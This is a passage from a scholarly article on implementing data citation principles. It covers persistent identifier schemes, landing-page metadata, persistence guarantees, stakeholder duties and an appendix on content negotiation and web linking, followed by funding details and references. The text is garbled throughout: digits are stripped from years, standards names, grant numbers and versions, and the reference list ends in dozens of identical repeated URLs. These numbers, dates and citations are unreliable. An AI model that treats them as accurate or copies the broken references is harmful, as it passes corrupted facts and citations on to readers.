b the crossref persistence contract language reads in part: "member must maintain each digital identifier assigned to it or for which it is otherwise responsible such that said digital identifier continuously resolves to a response page... containing no less than complete bibliographic information about the corresponding original work (including without limitation the digital identifier), visible on the initial page, with reasonably sufficient information detailing how the original work can be acquired and/or a hyperlink leading to the original works itself..."
c crossref identifier policy reads: "the... member shall use the digital identifier as the permanent url link to the response page. the... member shall register the url for the response page with crossref, shall keep it up-to-date and active, and shall promptly correct any errors or variances noted by crossref."
d for example, the french national library has rigorous internal checks for the million arks that it manages via its own resolver.

both require persistence commitments of their registrants and take active steps to monitor compliance. datacite is specifically designed—as its name would indicate—to support data citation. a recent collaboration between the software archive github, the zenodo repository system at cern, figshare, and mozilla science lab now makes it possible to cite software, giving dois to github-committed code (github guides, ).

handle system (hdls)

handles are identifiers in a general-purpose global name service designed for securely resolving names over the internet, compatible with but not requiring the domain name service. handles are location independent and persistent. the system was developed by bob kahn at the corporation for national research initiatives, and currently supports, on average, million resolution requests per month—the largest single user being the digital object identifier (doi) system. handles can be expressed as uris (cnri, ; dyson, ).

identifiers.org uniform resource identifiers (uris)

many common identifiers used in the life sciences, such as pubmed or protein data bank ids, are not natively web-resolvable. identifiers.org associates such database-dependent identifiers with persistent uris and resolvable physical urls. identifiers.org was developed and is maintained at the european bioinformatics institute, and was built on top of the miriam registry (juty, le novére & laibe, ).
identifiers.org uris are constructed using the syntax http://identifiers.org/<data resource name>/<native identifier>, where <data resource name> designates a particular database, and <native identifier> is the id used within that database to retrieve the record. the identifiers.org resolver supports multiple alternative locations (which may or may not be mirrors) for data it identifies. it supports programmatic access to data.

purls

purls are "persistent uniform resource locators", a system originally developed by the online computer library center (oclc). they act as intermediaries between potentially changing locations of digital resources, to which the purl name resolves. purls are registered and resolved at http://purl.org, http://purl.access.gpo.gov, http://purl.bioontology.org and various other resolvers. purls are implemented as an http redirection service and depend on the survival of their host domain name (oclc, ; library of congress, ). purls fail to resolve upon object removal. handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object.

http uris

uris (uniform resource identifiers) are strings of characters used to identify resources. they are the identifier system for the web. uris begin with a scheme name, such as http or ftp or mailto, followed by a colon, and then a scheme-specific part. http uris will be quite familiar as they are typed every day into browser address bars, and begin with http:. their scheme-specific part is next, beginning with "//", followed by an identifier, which often but not always is resolvable to a specific resource on the web. uris by themselves have no mechanism for storing metadata about any objects to which they are supposed to resolve, nor do they have any particular associated persistence policy. however, other identifier schemes with such properties, such as dois, are often represented as uris for convenience (berners-lee, fielding & masinter, ; jacobs & walsh, ). like purls, native http uris fail to resolve upon object removal. handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object.

archival resource key (arks)

archival resource keys are unique identifiers designed to support long-term persistence of information objects. an ark is essentially a url (uniform resource locator) with some additional rules. for example, hostnames are excluded when comparing arks in order to prevent current hosting arrangements from affecting identity. the maintenance agency is the california digital library, which offers a hosted service for arks and dois (kunze & starr, ; kunze, ; kunze & rodgers, ; janée, kunze & starr, ). arks provide access to three things—an information object; related metadata; and the provider's persistence commitment. arks propose inflections (changing the end of an identifier) as a way to retrieve machine-readable metadata without requiring (or prohibiting) content negotiation for linked data applications. unlike, for example, dois, there are no fees to assign arks, which can be hosted on an organization's own web server if desired. they are globally resolvable via the identifier-scheme-agnostic n t (name-to-thing, http://n t.net) resolver. the ark registry is replicated at the california
digital library, the bibliothéque nationale de france, and the us national library of medicine (kunze & starr, ; peyrard, kunze & tramoni, ; kunze, ).

national bibliography number (nbns)

national bibliography numbers are a set of related publication identifier systems with country-specific formats and resolvers, utilized by national library systems in some countries. they are used by, for example, germany, sweden, finland and italy, for publications in national archives without publisher-assigned identifiers such as isbns. there is a urn namespace for nbns that includes the country code; expressed as a urn, nbns become globally unique (hakala, ; moats, ).

landing pages

the identifier included in a citation should point to a landing page or set of pages rather than to the data itself (hourclé et al., ; rans et al., ; clark, evans & strollo, ), and the landing page should persist even if the data is no longer accessible. by "landing page(s)" we mean a set of information about the data via both structured metadata and unstructured text and other information. there are three main reasons to resolve identifiers to landing pages rather than directly to data. first, as proposed in the jddcp, the metadata and the data may have different lifespans, the metadata potentially surviving the data. this is true because data storage imposes costs on the hosting organization. just as printed volumes in a library may be de-accessioned from time to time, based on considerations of their value and timeliness, so will datasets.
the jddcp proposes that metadata, essentially cataloging information on the data, should still remain a citable part of the scholarly record even when the dataset may no longer be available. second, the cited data may not be legally available to all, even when initially accessioned, for reasons of licensing or confidentiality (e.g., protected health information). the landing page provides a method to host metadata even if the data is no longer present, and it also provides a convenient place where access credentials can be validated. third, resolution to a landing page allows for an access point that is independent from any multiple encodings of the data that may be available.

landing pages should contain the following information. items marked "conditional" are recommended if the conditions described are present, e.g., access controls are required to be implemented if required by licensing or phi considerations; multiple versions are required to be described if they are available; etc.

• (recommended) dataset descriptions: the landing page must provide descriptions of the datasets available, and information on how to programmatically retrieve data where a user or device is so authorized. (see dataset description for formats.)
• (conditional) versions: what versions of the data are available, if there is more than one version that may be accessed.
• (optional) explanatory or contextual information: provide explanations, contextual guidance, caveats, and/or documentation for data use, as appropriate.
• (conditional) access controls: access controls based on content licensing, protected health information (phi) status, institutional review board (irb) authorization, embargo, or other restrictions, should be implemented here if they are required.
• (recommended) persistence statement: reference to a statement describing the data and metadata persistence policies of the repository should be provided at the landing page. data persistence policies will vary by repository but should be clearly described. (see persistence guarantee for recommended language.)
• (recommended) licensing information: information regarding licensing should be provided, with links to the relevant licensing or waiver documents as required (e.g., the creative commons cc waiver description, https://creativecommons.org/publicdomain/zero/ . /, or other relevant material).
• (conditional) data availability and disposition: the landing page should provide information on the availability of the data if it is restricted, or has been de-accessioned (i.e., removed from the archive). as stated in the jddcp, metadata should persist beyond de-accessioning.
• (optional) tools/software: what tools and software may be associated or useful with the datasets, and how to obtain them (certain datasets are not readily usable without specific software).

content encoding on landing pages

landing pages should provide both human-readable and machine-readable content.

• html; that is, the native browser-interpretable format used to generate a graphical and/or language-based display in a browser window, for human reading and understanding.
• at least one non-proprietary machine-readable format; that is, a content format with a fully specified syntax capable of being parsed by software without ambiguity, at a data element level.
options: xml, json/json-ld, rdf (turtle, rdf-xml, n-triples, n-quads), microformats, microdata, rdfa.

best practices for dataset description

minimally, the following metadata elements should be present in dataset descriptions (a minimal machine-readable sketch follows the list):

• dataset identifier: a machine-actionable identifier resolvable on the web to the dataset.
• title: the title of the dataset.
• description: a description of the dataset, with more information than the title.
• creator: the person(s) and/or organizations who generated the dataset and are responsible for its integrity.
• publisher/contact: the organization and/or contact who published the dataset and is responsible for its persistence.
• publicationdate/year/releasedate: iso standard dates are preferred (klyne & newman, ).
• version: the dataset version identifier (if applicable).
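as a minimal sketch of these elements in machine-readable form (rendered here as json from python; the field names follow the list above rather than any single vocabulary, and all values are placeholders):

    import json

    dataset_description = {
        "identifier": "http://dx.doi.org/10.0000/example",   # placeholder doi uri
        "title": "example dataset title",
        "description": "a longer description of what the dataset contains.",
        "creator": ["example researcher", "example laboratory"],
        "publisher": "example data repository",
        "publicationDate": "2015-01-01",   # iso 8601 date, per the recommendation
        "version": "1.0",
    }

    print(json.dumps(dataset_description, indent=2))

in practice these fields would be expressed in one of the standard vocabularies discussed next (e.g., dcat or datacite metadata) rather than in an ad hoc structure.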
additional recommended metadata elements in dataset descriptions are:

• creator identifier(s): orcid or other unique identifier of the individual creator(s). orcid ids are numbers identifying individual researchers issued by a consortium of prominent academic publishers and others (editors, ; maunsell, ).
• license: the license or waiver under which access to the content is provided (preferably a link to standard license/waiver text, e.g., https://creativecommons.org/publicdomain/zero/ . /). when multiple datasets are available on one landing page, licensing information may be grouped for all relevant datasets.

a world wide web consortium (http://www.w .org) standard for machine-accessible dataset description on the web is the w c data catalog vocabulary (dcat; mali, erickson & archer, ). it was developed at the digital enterprise research institute and later standardized by the w c egovernment working group, with broad participation, and underlies some other data interoperability models such as (dcat application profile working group, ) and (gray et al., ). the w c health care and life sciences dataset description specification (gray et al., ), currently in editor's draft status, provides capability to add additional useful metadata beyond the dcat vocabulary. this is an evolving standard that we suggest for provisional use. data in the described datasets might also be described using other formats depending on the application area. other possible approaches for dataset description include datacite metadata (datacite metadata working group, ), dublin core (dublin core metadata initiative, ), the data documentation initiative (ddi) (data documentation initiative, ) for social sciences, or iso (iso/tc , ) for geographic information. where any of these formats are used they should support at least the minimal set of recommended metadata elements described above.

serving the landing pages

the uris used as identifiers for citation should resolve to html landing pages with the appropriate metadata in a human-readable form. to enable automated agents to extract the metadata, these landing pages should include an html <link> element specifying a machine-readable form of the page as an alternative. for those that are capable of doing so, we recommend also using web linking (nottingham, ) to provide this information from all of the alternative formats. should content management systems be developed specifically for maintaining and serving landing pages, we recommend both of these solutions plus the use of content negotiation (holtzman & mutz, ). a more detailed discussion of these techniques and our justification for using multiple solutions is included in the appendix. note that in all of these cases, the alternates are other forms of the landing page. access to the data itself should be indicated through the dcat fields accessurl or downloadurl as appropriate for the data. data that is spread across multiple files can be indicated by linking to an ore resource map (lagoze & van de sompel, ).
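the sketch below (python; the urls, file names, and the json-ld media type for the machine-readable alternate are assumptions, not prescriptions) illustrates the three techniques just mentioned: an html <link> element on the landing page, an equivalent http link header, and a very small content-negotiation choice based on the request's accept header.

    # html <link> element a landing page might embed so that automated agents
    # can discover a machine-readable alternate of the same page.
    LINK_ELEMENT = ('<link rel="alternate" type="application/ld+json" '
                    'href="https://repository.example.org/datasets/example.jsonld">')

    # equivalent http "link" header (web linking), usable from any
    # representation of the landing page, not only the html one.
    LINK_HEADER = ('<https://repository.example.org/datasets/example.jsonld>; '
                   'rel="alternate"; type="application/ld+json"')

    def choose_representation(accept_header):
        # minimal content negotiation: serve the machine-readable form when
        # the client asks for it, otherwise the human-readable html page.
        if "application/ld+json" in (accept_header or ""):
            return "example.jsonld"
        return "example.html"

    print(LINK_ELEMENT)
    print("Link: " + LINK_HEADER)
    print(choose_representation("application/ld+json"))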
persistence guarantees

the topic of persistence guarantees is important from the standpoint of what repository owners and managers should provide to support jddcp-compliant citable persistent data. it is closely related to the question of persistent identifiers; that is, the identifiers must always resolve somewhere, and as noted above, this should be to a landing page. but in the widest sense, persistence is a matter of service guarantees. organizations providing trusted repositories for citable data need to detail their persistence policies transparently to users. we recommend that all organizations endorsing the jddcp adopt a persistence guarantee for data and metadata based on the following template:

"[organization/institution name] is committed to maintaining persistent identifiers in [repository name] so that they will continue to resolve to a landing page providing metadata describing the data, including elements of stewardship, provenance, and availability.
[organization/institution name] has made the following plan for organizational persistence and succession: [plan]."

as noted in the landing pages section, when data is de-accessioned, the landing page should remain online, continuing to provide persistent metadata and other information including a notation on data de-accessioning. authors and scholarly article publishers will decide on which repositories meet their persistence and stewardship requirements based on the guarantees provided and their overall experience in using various repositories. guarantees need to be supported by operational practice.

implementation: stakeholder responsibilities

research communications are made possible by an ecosystem of stakeholders who prepare, edit, publish, archive, fund, and consume them. each stakeholder group endorsing the jddcp has, we believe, certain responsibilities regarding implementation of these recommendations. they will not all be implemented at once, or homogeneously. but careful adherence to these guidelines and responsibilities will provide a basis for achieving the goals of uniform scholarly data citation.

1. archives and repositories: (a) identifiers, (b) resolution behavior, (c) landing page metadata elements, (d) dataset description and (e) data access methods should all conform to the technical recommendations in this article.
2. registries: registries of data repositories such as databib (http://databib.org) and r data (http://www.re data.org) should document repository conformance to these recommendations as part of their registration process, and should make this information readily available to researchers and the public. this also applies to lists of "recommended" repositories maintained by publishers, such as those maintained by nature scientific data (http://www.nature.com/sdata/data-policies/repositories) and f research (http://f research.com/for-authors/data-guidelines).
3. researchers: researchers should treat their original data as first-class research objects. they should ensure it is deposited in an archive that adheres to the practices described
here. we also encourage authors to publish preferentially with journals which implement these practices.
4. funding agencies: agencies and philanthropies funding research should require that recipients of funding follow the guidelines applicable to them.
5. scholarly societies: scholarly societies should strongly encourage adoption of these practices by their members and by publications that they oversee.
6. academic institutions: academic institutions should strongly encourage adoption of these practices by researchers appointed to them and should ensure that any institutional repositories they support also apply the practices relevant to them.

conclusion

these guidelines, together with the niso jats . d xml schema for article publishing (national center for biotechnology information, ), provide a working technical basis for implementing the joint data citation principles. they were developed by a cross-disciplinary group hosted by the force .org digital scholarship community, the data citation implementation group (dcig, https://www.force .org/datacitationimplementation), during , as a follow-on project to the successfully concluded joint data citation principles effort. force .org (http://force .org) is a community of scholars, librarians, archivists, publishers and research funders that has arisen organically to help facilitate the change toward improved knowledge creation and sharing; it is incorporated as a us (c) not-for-profit organization in california.

registries of data repositories such as r data (http://r data.org) and publishers' lists of "recommended" repositories for cited data, such as those maintained by nature publications (http://www.nature.com/sdata/data-policies/repositories), should take ongoing note of repository compliance to these guidelines, and provide compliance checklists. we are aware that some journals are already citing data in persistent public repositories, and yet not all of these repositories currently meet the guidelines we present here. compliance will be an incremental improvement task. other deliverables from the dcig are planned for release in early , including a review of selected data-citation workflows from early-adopter publishers (nature, biomed central, wiley and faculty of ). the niso-jats version . d revision is now considered a stable release by the jats standing committee, and is under final review by the national information standards organization (niso) for approval as the updated ansi/niso z . - standard. we believe it is safe for publishers to use the . d revision for data citation now. a forthcoming article in this series will describe the jats revisions in detail.

we hope that publishing this document and others in the series will accelerate the adoption of data citation on a wide scale in the scholarly literature, to support open validation and reuse of results. integrity of scholarly data is not a private matter, but is fundamental to the validity of published research. if data are not robustly preserved and accessible, the foundations of published research claims based upon them are not verifiable. as these practices and guidelines are increasingly adopted, it will no longer be acceptable to credibly assert any
claims whatsoever that are not based upon robustly archived, identified, searchable and accessible data. we welcome comments and questions, which should be addressed to the forcnet@googlegroups.com open discussion forum.

acknowledgements

we are particularly grateful to peerj academic editor harry hochheiser (university of pittsburgh), reviewer tim vines (university of british columbia), and two anonymous reviewers, for their careful, very helpful, and exceptionally timely comments on the first version of this article. many thanks as well to virginia clark (université paul sabatier), john kunze (california digital library) and maryann martone (university of california at san diego) for their thoughtful suggestions on content and presentation.
appendix

serving landing pages: implementation details

ideally, all versions of the landing page would be resolvable from a single uri through content negotiation (holtzman & mutz, ), serving an html representation for humans and the appropriate form for automated agents. in its simplest form, content negotiation uses the http accept and/or accept-language headers to vary the content returned based on media type (a.k.a. mime type) and language. ark-style inflections offer an alternate way to retrieve machine-readable metadata without requiring content negotiation. some web servers have provision to serve alternate documents by using file names that vary only by extension; when the document is requested without an extension, the web server returns the file rated highest by the request's accept header. enabling this feature typically requires the intervention of the web server administrator and thus may not be available to all publishers. the content negotiation standard also allows servers to assign arbitrary tags to documents and for user agents to request documents that match a given tag using the accept-features header. this could allow for selection between documents that use the same media type but different metadata standards.

although we believe that content negotiation is the best long-term solution for serving automated agents, it may require building systems to manage landing page content or adapting existing content management systems (cms). for a near-term solution, we recommend web linking (nottingham, ). web linking requires assigning a separate resolvable uri to each variant representation of the landing page. as each alternative has its own uri, the documents can be cached reliably without requiring additional requests to the server hosting the landing pages. web linking also allows additional relationships to be defined, so that it can be used to direct automated agents to landing pages for related data as well as to alternatives. web linking also allows a title to be assigned to each link, should it be presented to a human:

link: <uri-to-an-alternate>; rel="alternate"; media="application/xml"; title="title"

we recommend including in the title the common names of the metadata schema(s) used, such as datacite or dcat, to allow automated agents to select the appropriate alternative.
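to make the agent-side behaviour concrete, the following minimal sketch (not part of the guidelines themselves) shows how a harvester might combine the first two techniques: request the landing page with an accept header and, failing that, follow an "alternate" entry in the http link header. the landing-page uri, the fetch_machine_readable helper, and the use of the third-party python requests library are illustrative assumptions only.

```python
# minimal agent-side sketch: content negotiation first, link-header fallback second.
# the uri and helper name are hypothetical; the 'requests' library is assumed.
import requests

LANDING_PAGE = "https://example.org/landing/dataset-123"  # hypothetical landing page


def fetch_machine_readable(uri, media_type="application/xml"):
    # 1) content negotiation: ask the landing page itself for the desired media type.
    resp = requests.get(uri, headers={"Accept": media_type}, timeout=30)
    if resp.headers.get("Content-Type", "").startswith(media_type):
        return resp.content

    # 2) web linking fallback: look for an 'alternate' link whose 'media' parameter
    #    (the convention shown above) matches the desired media type.
    link_header = resp.headers.get("Link", "")
    if link_header:
        for link in requests.utils.parse_header_links(link_header):
            if link.get("rel") == "alternate" and link.get("media") == media_type:
                return requests.get(link["url"], timeout=30).content

    return None  # no machine-readable alternate advertised


if __name__ == "__main__":
    metadata = fetch_machine_readable(LANDING_PAGE)
    print("metadata retrieved" if metadata else "no machine-readable alternate found")
```

the html fallback described next could be handled in the same spirit by scanning the returned html for link elements with rel="alternate".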
as an additional fallback, we also recommend using html <link> elements to duplicate the linking information in the html version of the landing page:

<link href="uri-to-an-alternate" rel="alternate" media="application/xml" title="title">

embedding the information in the html has the added benefit of keeping the alternate information attached if the landing page is downloaded from a standard web browser. this is not the case for web linking through http headers, nor for content negotiation. in addition, content negotiation may not send back the full list of alternatives without the user agent sending a negotiate: vlist header (shepherd et al., ). as each of the three techniques has points where it has advantages over the others, we recommend a combination of the three approaches for maximum benefit, but acknowledge that some may take more effort to implement.

serving landing pages: linking to the data

note that the content being negotiated is the metadata description of the research data. the data being described should not be served via this description uri. instead, the landing page data descriptions should reference the data. if the data is available as a single file, directly available on the internet, use the dcat downloadurl to indicate the location of the data. if the data is available as a relatively small number of files, either as parts of the whole collection, mirrored at multiple locations, or as multiple packaged forms, link to an ore resource map (lagoze et al., ) to describe the relationships between the files. if the data requires authentication to access, use the dcat accessurl to indicate a page with instructions on how to request access to the data. this technique can also be used to describe the procedures for accessing physical samples or other non-digital data. if the data is available online but is excessive in volume, use the dcat accessurl to link to the appropriate search system to access the data. for data systems that are available either as bulk downloads or through sub-setting services, include both accessurl and downloadurl on the landing page.
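as a further illustration, and again only as a sketch rather than a prescription from these guidelines, the fragment below uses the dcat vocabulary to distinguish a downloadurl (data fetchable directly) from an accessurl (a page describing how to request access). all uris and identifiers are hypothetical, and the python rdflib library is an assumed convenience for producing the machine-readable description.

```python
# hypothetical dcat description of one dataset with two distributions:
# an openly downloadable file (downloadURL) and a restricted one (accessURL).
from rdflib import Graph, Namespace, URIRef, Literal

DCAT = Namespace("http://www.w3.org/ns/dcat#")
DCT = Namespace("http://purl.org/dc/terms/")

g = Graph()
g.bind("dcat", DCAT)
g.bind("dct", DCT)

dataset = URIRef("https://example.org/landing/dataset-123")  # hypothetical landing page
g.add((dataset, DCT.title, Literal("example survey data")))

# distribution 1: a single file directly available on the internet
dist_open = URIRef("https://example.org/landing/dataset-123#open")
g.add((dataset, DCAT.distribution, dist_open))
g.add((dist_open, DCAT.downloadURL, URIRef("https://example.org/files/dataset-123.csv")))

# distribution 2: restricted data, so point at instructions for requesting access
dist_gated = URIRef("https://example.org/landing/dataset-123#restricted")
g.add((dataset, DCAT.distribution, dist_gated))
g.add((dist_gated, DCAT.accessURL, URIRef("https://example.org/request-access/dataset-123")))

print(g.serialize(format="turtle"))
```

the same pattern extends to the bulk-download-plus-search case simply by attaching both accessurl and downloadurl triples to the relevant distribution.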
additional information and declarations

funding

this work was funded in part by generous grants from the us national institutes of health and national aeronautics and space administration, the alfred p. sloan foundation, and the european union (fp ). support from the national institutes of health (nih) was provided via grant # nih u ai - in the big data to knowledge program, supporting the center for expanded data annotation and retrieval (cedar). support from the national aeronautics and space administration (nasa) was provided under contract nng hq c for the continued operation of the socioeconomic data and applications center (sedac). support from the alfred p. sloan foundation was provided under two grants: a. grant # - - to the harvard institute for quantitative social sciences, "helping journals to upgrade data publication for reusable research"; and b. a grant to the california digital library, "clir/dlf postdoctoral fellowship in data curation for the sciences and social sciences". the european union partially supported this work under the fp contracts # supporting the alliance for permanent access and # supporting digital preservation for timeless business processes and services. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures

the following grant information was disclosed by the authors:
national institutes of health (nih): # nih u ai - .
alfred p. sloan foundation: # - - .
european union (fp ): # , # .
national aeronautics and space administration (nasa): nng hq c.

competing interests

the authors declare there are no competing interests.

author contributions

• joan starr and tim clark conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• eleni castro, mercè crosas, michel dumontier, robert r. downs, ruth duerr, laurel l. haak, melissa haendel, ivan herman, simon hodson, joe hourclé, john ernest kratz, jennifer lin, lars holm nielsen, amy nurnberger, stefan proell, andreas rauber, simone sacchi, arthur smith and mike taylor performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper.

references

accomazzi a, henneken e, erdmann c, rots a. . telescope bibliographies: an essential component of archival data management and operations. in: society of photo-optical instrumentation engineers (spie) conference series. vol. . article id k, pp doi . / . .
alsheikh-ali aa, qureshi w, al-mallah mh, ioannidis jpa. . public availability of published research data in high-impact journals. plos one ( ):e doi . /journal.pone. .
altman m, crosas m. . the evolution of data citation: from principles to implementation. iassist quarterly (spring): – . available at http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation.
altman m, king g. . a proposed standard for the scholarly citation of quantitative data. dlib magazine ( / ). available at http://www.dlib.org/dlib/march /altman/ altman.html.
ball a, duke m. . how to cite datasets and link to publications. technical report. datacite. available at http://www.dcc.ac.uk/resources/how-guides.
begley cg, ellis lm. . drug development: raise standards for preclinical cancer research. nature ( ): – doi . / a.
berners-lee t, fielding r, masinter l. . rfc : uniform resource identifiers (uri): generic syntax. available at https://www.ietf.org/rfc/rfc .txt.
booth d, haas h, mccabe f, newcomer e, champion m, ferris c, orchard d. . web services architecture: w c working group note february . technical report. world wide web consortium. available at http://www.w .org/tr/ws-arch/.
borgman c. . why are the attribution and citation of scientific data important? in: uhlir p, ed. for attribution—developing data attribution and citation practices and standards. summary of an international workshop. washington d.c.: national academies press.
bray t, paoli j, sperberg-mcqueen cm, maler e, yergeau f. . extensible markup language (xml) . (fifth edition): w c recommendation november . available at http://www.w .org/tr/rec-xml/.
clark a, evans p, strollo a. . fdsn recommendations for seismic network dois and related fdsn services, version . . technical report. international federation of digital seismograph networks. available at http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf.
cnri. . handle system: unique and persistent identifiers for internet resources. available at http://www.w .org/tr/webarch/#identification.
codata-icsti task group on data citation standards and practices. . out of cite, out of mind: the current state of practice, policy and technology for data citation. data science journal (september): – doi . /dsj.osom - .
colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. .
data citation synthesis group. . joint declaration of data citation principles. available at http://force .org/datacitation.
data documentation initiative. . data documentation initiative specification. available at http://www.ddialliance.org/specification/.
datacite metadata working group. . datacite metadata schema for the publication and citation of research data, version . october . available at http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf.
dcat application profile working group. . dcat application profile for data portals in europe. available at https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final.
dublin core metadata initiative. . dublin core metadata element set, version . . available at http://dublincore.org/documents/dces/.
dyson e. . online registries: the dns and beyond. available at http://doi.contentdirections.com/reprints/dyson_excerpt.pdf.
http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html 
http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . 
